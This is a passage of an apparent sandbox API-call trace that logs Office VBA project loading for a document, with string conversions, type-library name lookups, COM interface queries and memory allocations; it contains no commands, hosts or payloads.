lpMultiByteStr="*\\z045e95ca91", lpUsedDefaultChar=0x0) returned 14 [0068.029] _wcsicmp (_String1="*\\Z045e95ca91", _String2="*\\Z045e95ca91") returned 0 [0068.029] GetLocalTime (in: lpSystemTime=0x1474d0 | out: lpSystemTime=0x1474d0*(wYear=0x7e3, wMonth=0x4, wDayOfWeek=0x0, wDay=0xe, wHour=0xe, wMinute=0x25, wSecond=0x5, wMilliseconds=0xd1)) [0068.029] wcsncpy_s (in: _Destination=0x147180, _SizeInWords=0x108, _Source="*\\Z045e95ca91", _MaxCount=0x106 | out: _Destination="*\\Z045e95ca91") returned 0x0 [0068.029] CharLowerBuffW (in: lpsz="*\\Z045e95ca91", cchLength=0xd | out: lpsz="*\\z045e95ca91") returned 0xd [0068.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z045e95ca91", cchWideChar=14, lpMultiByteStr=0x1470b0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z045e95ca91", lpUsedDefaultChar=0x0) returned 14 [0068.029] _wcsicmp (_String1="*\\Z045e95ca91", _String2="*\\Z045e95ca91") returned 0 [0068.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x147540, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0068.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0068.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x147540, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0068.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x147400, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0068.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0068.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0068.029] IMalloc:Realloc (This=0x7fefec05380, pv=0x682e640, cb=0x50) returned 0x680a340 [0068.029] IMalloc:Free (This=0x7fefec05380, pv=0x646f8b0) [0068.029] wcsncpy_s (in: _Destination=0x147200, _SizeInWords=0x108, _Source="*\\Z045e95ca91", _MaxCount=0x106 | out: _Destination="*\\Z045e95ca91") returned 0x0 [0068.029] CharLowerBuffW (in: lpsz="*\\Z045e95ca91", cchLength=0xd | out: lpsz="*\\z045e95ca91") returned 0xd [0068.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z045e95ca91", cchWideChar=14, lpMultiByteStr=0x147130, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z045e95ca91", lpUsedDefaultChar=0x0) returned 14 [0068.029] _wcsicmp (_String1="*\\Z045e95ca91", _String2="*\\Z045e95ca91") returned 0 [0068.029] strcpy_s (in: _Dst=0x6a18840, _DstSize=0x7, _Src="Normal" | out: _Dst="Normal") returned 0x0 [0068.030] SysStringByteLen (bstr="潎浲污") returned 0x6 [0068.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6885c98, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0068.030] SysStringByteLen (bstr="潎浲污") returned 0x6 [0068.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6885c98, cbMultiByte=7, lpWideCharStr=0x682e648, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0068.030] lstrlenA (lpString="Normal") returned 6 [0068.030] SysStringByteLen (bstr="潎浲污") returned 0x6 [0068.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6885c98, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0068.030] SysStringByteLen (bstr="潎浲污") returned 0x6 [0068.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6885c98, cbMultiByte=7, lpWideCharStr=0x682e648, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0068.030] lstrlenA (lpString="Normal") returned 6 [0068.032] wcscpy_s (in: _Destination=0x1476a6, _SizeInWords=0x105, _Source="Normal" | out: _Destination="Normal") returned 0x0 [0068.032] _wcsicmp (_String1="*\\CNormal", _String2="*\\Z045e95ca91") returned -23 [0068.032] IUnknown:AddRef (This=0x665ba50) returned 0x4 [0068.032] IUnknown:QueryInterface (in: This=0x665ba50, riid=0x7fee3b25c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x147108 | out: ppvObject=0x147108*=0x0) returned 0x80004002 [0068.032] IUnknown:Release (This=0x665ba50) returned 0x3 [0068.032] IUnknown:AddRef (This=0x631b4c0) returned 0x5 [0068.032] IUnknown:QueryInterface (in: This=0x631b4c0, riid=0x7fee3b25c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x147108 | out: ppvObject=0x147108*=0x0) returned 0x80004002 [0068.032] IUnknown:Release (This=0x631b4c0) returned 0x4 [0068.032] IUnknown:AddRef (This=0x665bd20) returned 0x5 [0068.032] IUnknown:QueryInterface (in: This=0x665bd20, riid=0x7fee3b25c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x147108 | out: ppvObject=0x147108*=0x0) returned 0x80004002 [0068.032] IUnknown:Release (This=0x665bd20) returned 0x4 [0068.033] wcsncpy_s (in: _Destination=0x146dd0, _SizeInWords=0x108, _Source="*\\Z045e95ca91", _MaxCount=0x106 | out: _Destination="*\\Z045e95ca91") returned 0x0 [0068.033] CharLowerBuffW (in: lpsz="*\\Z045e95ca91", cchLength=0xd | out: lpsz="*\\z045e95ca91") returned 0xd [0068.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z045e95ca91", cchWideChar=14, lpMultiByteStr=0x146d00, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z045e95ca91", lpUsedDefaultChar=0x0) returned 14 [0068.033] _wcsicmp (_String1="*\\Z045e95ca91", _String2="*\\Z045e95ca91") returned 0 [0068.033] wcsncpy_s (in: _Destination=0x146dd0, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0068.033] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0068.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x146d00, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0068.033] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0068.034] wcscpy_s (in: _Destination=0xaf2e128, _SizeInWords=0xa, _Source="*\\CNormal" | out: _Destination="*\\CNormal") returned 0x0 [0068.034] wcsncpy_s (in: _Destination=0x146dd0, _SizeInWords=0x108, _Source="*\\Z045e95ca91", _MaxCount=0x106 | out: _Destination="*\\Z045e95ca91") returned 0x0 [0068.034] CharLowerBuffW (in: lpsz="*\\Z045e95ca91", cchLength=0xd | out: lpsz="*\\z045e95ca91") returned 0xd [0068.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z045e95ca91", cchWideChar=14, lpMultiByteStr=0x146d00, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z045e95ca91", lpUsedDefaultChar=0x0) returned 14 [0068.034] _wcsicmp (_String1="*\\Z045e95ca91", _String2="*\\Z045e95ca91") returned 0 [0068.034] wcsncpy_s (in: _Destination=0x146e10, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0068.034] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0068.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x146d40, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0068.035] wcscpy_s (in: _Destination=0x6a6e770, _SizeInWords=0x108, _Source="*\\CNormal" | out: _Destination="*\\CNormal") returned 0x0 [0068.035] _wfullpath (in: _Buffer=0x147620, _Path="Normal", _BufferCount=0x104 | out: _Buffer="C:\\Users\\aETAdzjz\\Documents\\Normal") returned="C:\\Users\\aETAdzjz\\Documents\\Normal" [0068.035] SysStringByteLen (bstr="潎浲污") returned 0x6 [0068.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6885c98, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0068.036] SysStringByteLen (bstr="潎浲污") returned 0x6 [0068.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6885c98, cbMultiByte=7, lpWideCharStr=0x682e648, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0068.036] malloc (_Size=0x20) returned 0x25187f0 [0068.036] ITypeInfo:RemoteGetDocumentation (in: This=0x695c8c0, memid=-1, refPtrFlags=0x1479b8, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x25187f8 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x25187f8*="\x91e4\xe39a\x7fe") returned 0x0 [0068.036] IUnknown:Release (This=0x695c8c0) returned 0x0 [0068.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=-1, lpMultiByteStr=0x147990, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0068.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=-1, lpMultiByteStr=0x147970, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0068.036] IsCharAlphaA (ch=84) returned 1 [0068.037] lstrlenA (lpString="ThisDocument") returned 12 [0068.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1479d0, cbMultiByte=-1, lpWideCharStr=0x25187c0, cchWideChar=13 | out: lpWideCharStr="ThisDocument") returned 13 [0068.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x147810, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0068.037] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0068.037] lstrlenA (lpString="ThisDocument") returned 12 [0068.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1479d0, cbMultiByte=-1, lpWideCharStr=0x25187c0, cchWideChar=13 | out: lpWideCharStr="ThisDocument") returned 13 [0068.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x1477d0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0068.037] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0068.037] lstrlenA (lpString="ThisDocument") returned 12 [0068.037] malloc (_Size=0x188) returned 0x251c710 [0068.037] malloc (_Size=0x98) returned 0x251c8a0 [0068.037] ITypeInfo:RemoteGetTypeAttr (in: This=0x695c760, ppTypeAttr=0x1477c0, pDummy=0x0 | out: ppTypeAttr=0x1477c0, pDummy=0x0) returned 0x0 [0068.037] ITypeInfo:LocalReleaseTypeAttr (This=0x695c760) returned 0x0 [0068.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1479d0, cbMultiByte=-1, lpWideCharStr=0x147830, cchWideChar=13 | out: lpWideCharStr="ThisDocument") returned 13 [0068.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x147450, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0068.037] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0068.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x147590, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0068.037] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0068.038] IMalloc:Realloc (This=0x7fefec05380, pv=0x6a59910, cb=0x8) returned 0x6a59a30 [0068.038] IMalloc:Alloc (This=0x7fefec05380, cb=0x80) returned 0xaf60fa0 [0068.038] IMalloc:GetSize (This=0x7fefec05380, pv=0xaf60fa0) returned 0x80 [0068.038] IMalloc:Alloc (This=0x7fefec05380, cb=0xb8) returned 0xaf03410 [0068.038] IMalloc:Alloc (This=0x7fefec05380, cb=0xb8) returned 0xaf03350 [0068.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x147450, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0068.038] CoCreateGuid (in: pguid=0x147180 | out: pguid=0x147180*(Data1=0xa1d77a3e, Data2=0x9ae0, Data3=0x4897, Data4=([0]=0xac, [1]=0x95, [2]=0x33, [3]=0xae, [4]=0x66, [5]=0xe9, [6]=0x30, [7]=0x49))) returned 0x0 [0068.038] CoCreateGuid (in: pguid=0x147190 | out: pguid=0x147190*(Data1=0x742658c9, Data2=0x49e8, Data3=0x4bbe, Data4=([0]=0xb3, [1]=0xed, [2]=0x1c, [3]=0xc9, [4]=0xbc, [5]=0x87, [6]=0x6e, [7]=0x35))) returned 0x0 [0068.038] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x1471a0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0068.038] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0068.038] GetLocalTime (in: lpSystemTime=0x147078 | out: lpSystemTime=0x147078*(wYear=0x7e3, wMonth=0x4, wDayOfWeek=0x0, wDay=0xe, wHour=0xe, wMinute=0x25, wSecond=0x5, wMilliseconds=0xe1)) [0068.038] _ultow_s (in: _Value=0x5e95ca91, _Buffer=0xafd3e94, _BufferCount=0x9, _Radix=16 | out: _Buffer="5e95ca91") returned 0x0 [0068.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="055e95ca91", cchWideChar=11, lpMultiByteStr=0x147010, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="055e95ca91", lpUsedDefaultChar=0x0) returned 11 [0068.038] strcpy_s (in: _Dst=0x6a18850, _DstSize=0xd, _Src="ThisDocument" | out: _Dst="ThisDocument") returned 0x0 [0068.038] IMalloc:Realloc (This=0x7fefec05380, pv=0x6a598d0, cb=0x68) returned 0x694ff50 [0068.038] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0068.038] wcscpy_s (in: _Destination=0xafd3ea8, _SizeInWords=0xd, _Source="ThisDocument" | out: _Destination="ThisDocument") returned 0x0 [0068.038] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0068.038] wcscpy_s (in: _Destination=0xafd3ec8, _SizeInWords=0xd, _Source="ThisDocument" | out: _Destination="ThisDocument") returned 0x0 [0068.038] IMalloc:Realloc (This=0x7fefec05380, pv=0x6a598f0, cb=0x12) returned 0x67bf780 [0068.038] IMalloc:Realloc (This=0x7fefec05380, pv=0x6a598e0, cb=0x6) returned 0x6a598f0 [0068.038] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0068.038] IMalloc:Realloc (This=0x7fefec05380, pv=0x682e580, cb=0x5c) returned 0x694ffc0 [0068.038] IMalloc:Free (This=0x7fefec05380, pv=0x646f8b0) [0068.038] IMalloc:Alloc (This=0x7fefec05380, cb=0x3d0) returned 0x3f54430 [0068.039] IMalloc:Alloc (This=0x7fefec05380, cb=0x20) returned 0x682e580 [0068.039] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c1400 [0068.039] IMalloc:Alloc (This=0x7fefec05380, cb=0x80) returned 0xaf61030 [0068.039] IMalloc:Alloc (This=0x7fefec05380, cb=0x0) returned 0x6a598e0 [0068.039] IMalloc:Alloc (This=0x7fefec05380, cb=0x0) returned 0x6a598d0 [0068.039] wcsncpy_s (in: _Destination=0x146ed0, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0068.039] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0068.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x146e00, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0068.039] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0068.039] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_Evaluate") returned 0x10d918 [0068.039] strcpy_s (in: _Dst=0x1470a0, _DstSize=0xa, _Src="_Evaluate" | out: _Dst="_Evaluate") returned 0x0 [0068.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1470a0, cbMultiByte=10, lpWideCharStr=0x146ef0, cchWideChar=10 | out: lpWideCharStr="_Evaluate") returned 10 [0068.039] IUnknown:AddRef (This=0x665ba50) returned 0x4 [0068.039] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_Evaluate", lHashVal=0x10d918, pfName=0x146fc0, pBstrLibName=0x146ef0 | out: pfName=0x146fc0*=0, pBstrLibName=0x146ef0) returned 0x0 [0068.039] IUnknown:Release (This=0x665ba50) returned 0x3 [0068.039] IUnknown:AddRef (This=0x631b4c0) returned 0x6 [0068.039] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_Evaluate", lHashVal=0x10d918, pfName=0x146fc0, pBstrLibName=0x146ef0 | out: pfName=0x146fc0*=0, pBstrLibName=0x146ef0) returned 0x0 [0068.039] IUnknown:Release (This=0x631b4c0) returned 0x5 [0068.039] IUnknown:AddRef (This=0x665bd20) returned 0x5 [0068.039] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_Evaluate", lHashVal=0x10d918, pfName=0x146fc0, pBstrLibName=0x146ef0 | out: pfName=0x146fc0*=0, pBstrLibName=0x146ef0) returned 0x0 [0068.039] IUnknown:Release (This=0x665bd20) returned 0x4 [0068.039] IUnknown:QueryInterface (in: This=0x695c8c0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x147608 | out: ppvObject=0x147608*=0x0) returned 0x80004002 [0068.039] IUnknown:QueryInterface (in: This=0x695c8c0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1475b8 | out: ppvObject=0x1475b8*=0x0) returned 0x80004002 [0068.039] ITypeInfo:RemoteGetTypeAttr (in: This=0x695c8c0, ppTypeAttr=0x147598, pDummy=0x10 | out: ppTypeAttr=0x147598, pDummy=0x10) returned 0x0 [0068.040] ITypeInfo:LocalReleaseTypeAttr (This=0x695c8c0) returned 0x0 [0068.040] ITypeInfo:GetImplTypeFlags (in: This=0x695c8c0, index=0x0, pImplTypeFlags=0x1475b4 | out: pImplTypeFlags=0x1475b4*=1) returned 0x0 [0068.040] ITypeInfo:GetRefTypeOfImplType (in: This=0x695c8c0, index=0x0, pRefType=0x147590 | out: pRefType=0x147590*=0x6300) returned 0x0 [0068.040] ITypeInfo:GetRefTypeInfo (in: This=0x695c8c0, hreftype=0x6300, ppTInfo=0x147588 | out: ppTInfo=0x147588*=0x695c918) returned 0x0 [0068.040] ITypeInfo:RemoteGetTypeAttr (in: This=0x695c918, ppTypeAttr=0x147598, pDummy=0x147570 | out: ppTypeAttr=0x147598, pDummy=0x147570*=0x1475c0) returned 0x0 [0068.040] ITypeInfo:LocalReleaseTypeAttr (This=0x695c918) returned 0x0 [0068.040] ITypeInfo:GetRefTypeOfImplType (in: This=0x695c918, index=0xffffffff, pRefType=0x147590 | out: pRefType=0x147590*=0xfffffffe) returned 0x0 [0068.040] ITypeInfo:GetRefTypeInfo (in: This=0x695c918, hreftype=0xfffffffe, ppTInfo=0x147600 | out: ppTInfo=0x147600*=0x695c970) returned 0x0 [0068.040] IUnknown:Release (This=0x695c918) returned 0x1 [0068.040] ITypeInfo:RemoteGetTypeAttr (in: This=0x695c8c0, ppTypeAttr=0x1475b8, pDummy=0x3 | out: ppTypeAttr=0x1475b8, pDummy=0x3) returned 0x0 [0068.040] ITypeInfo:LocalReleaseTypeAttr (This=0x695c8c0) returned 0x0 [0068.040] ITypeInfo:GetImplTypeFlags (in: This=0x695c8c0, index=0x0, pImplTypeFlags=0x1475ac | out: pImplTypeFlags=0x1475ac*=1) returned 0x0 [0068.040] ITypeInfo:GetImplTypeFlags (in: This=0x695c8c0, index=0x1, pImplTypeFlags=0x1475ac | out: pImplTypeFlags=0x1475ac*=2) returned 0x0 [0068.040] ITypeInfo:GetImplTypeFlags (in: This=0x695c8c0, index=0x2, pImplTypeFlags=0x1475ac | out: pImplTypeFlags=0x1475ac*=3) returned 0x0 [0068.040] ITypeInfo:GetRefTypeOfImplType (in: This=0x695c8c0, index=0x2, pRefType=0x1475b0 | out: pRefType=0x1475b0*=0x10700) returned 0x0 [0068.040] ITypeInfo:GetRefTypeInfo (in: This=0x695c8c0, hreftype=0x10700, ppTInfo=0x147610 | out: ppTInfo=0x147610*=0x695ca20) returned 0x0 [0068.040] IUnknown:QueryInterface (in: This=0x695c970, riid=0x7fee3b2e860*(Data1=0xb196b284, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1475b0 | out: ppvObject=0x1475b0*=0x67c02c0) returned 0x0 [0068.042] IConnectionPointContainer:FindConnectionPoint (in: This=0x67c02c0, riid=0x7fee3b30ba8*(Data1=0x20410, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppCP=0x1475a8 | out: ppCP=0x1475a8*=0x680a340) returned 0x0 [0068.042] IMalloc:Alloc (This=0x7fefec05380, cb=0x20) returned 0x682e820 [0068.042] IConnectionPoint:Advise (in: This=0x680a340, pUnkSink=0x682e820, pdwCookie=0x1475a4 | out: pdwCookie=0x1475a4*=0x4) returned 0x0 [0068.043] IMalloc:Alloc (This=0x7fefec05380, cb=0x20) returned 0x682e610 [0068.043] IMalloc:Realloc (This=0x7fefec05380, pv=0x6a598e0, cb=0x20) returned 0x682e670 [0068.043] IMalloc:Realloc (This=0x7fefec05380, pv=0x6a59910, cb=0x28) returned 0x682e550 [0068.043] IUnknown:QueryInterface (in: This=0x695c970, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1473c0 | out: ppvObject=0x1473c0*=0x0) returned 0x80004002 [0068.043] IUnknown:QueryInterface (in: This=0x695c970, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x147390 | out: ppvObject=0x147390*=0x0) returned 0x80004002 [0068.043] IUnknown:QueryInterface (in: This=0x695c970, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x147380 | out: ppvObject=0x147380*=0x0) returned 0x80004002 [0068.043] IUnknown:QueryInterface (in: This=0x695c970, riid=0x7fee3b30b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x147388 | out: ppvObject=0x147388*=0x0) returned 0x80004002 [0068.043] ITypeInfo:RemoteGetTypeAttr (in: This=0x695c970, ppTypeAttr=0x1473b8, pDummy=0x10 | out: ppTypeAttr=0x1473b8, pDummy=0x10) returned 0x0 [0068.043] ITypeInfo:LocalReleaseTypeAttr (This=0x695c970) returned 0x0 [0068.043] IUnknown:AddRef (This=0x695c970) returned 0x2 [0068.043] IUnknown:QueryInterface (in: This=0x695ca20, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1473d0 | out: ppvObject=0x1473d0*=0x0) returned 0x80004002 [0068.043] IUnknown:QueryInterface (in: This=0x695ca20, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1473a0 | out: ppvObject=0x1473a0*=0x0) returned 0x80004002 [0068.043] IUnknown:QueryInterface (in: This=0x695ca20, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x147390 | out: ppvObject=0x147390*=0x0) returned 0x80004002 [0068.043] IUnknown:QueryInterface (in: This=0x695ca20, riid=0x7fee3b30b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x147398 | out: ppvObject=0x147398*=0x0) returned 0x80004002 [0068.043] ITypeInfo:RemoteGetTypeAttr (in: This=0x695ca20, ppTypeAttr=0x1473c8, pDummy=0x10 | out: ppTypeAttr=0x1473c8, pDummy=0x10) returned 0x0 [0068.043] ITypeInfo:LocalReleaseTypeAttr (This=0x695ca20) returned 0x0 [0068.043] IUnknown:AddRef (This=0x695ca20) returned 0x2 [0068.043] IUnknown:QueryInterface (in: This=0x695c8c0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, 